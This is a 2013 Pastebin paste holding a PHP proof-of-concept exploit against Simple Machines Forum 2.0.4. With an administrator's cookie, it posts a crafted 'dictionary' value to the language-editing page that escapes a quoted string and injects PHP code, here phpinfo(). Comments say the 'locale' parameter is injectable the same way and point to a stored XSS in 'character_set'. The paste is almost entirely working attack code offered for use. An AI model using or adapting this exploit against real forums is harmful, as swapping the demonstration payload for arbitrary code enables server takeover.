p0c for smf 2.0.4
a guest Apr 23rd, 2013 1,004 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- // proof of concept that latest SMF (2.0.4) can be exploited by php injection.
- // payload code must escape from \', so you should try with something like that:
- // p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
- // For character_set - another story, as far as I remember, because here we have
- // a nice stored xss. ;)
- // 21/04/2013
- // http://HauntIT.blogspot.com
- // to successfully exploit smf 2.0.4 we need correct admin's cookie:
- $cookie = 'SMFCookie956=allCookiesHere';
- $ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_COOKIE, $cookie);
- curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
- curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $page = curl_exec($ch);
- echo 'PHP code:<br>'.$page;
- curl_close($ch); // to close 'logged-in' part
RAW Paste Data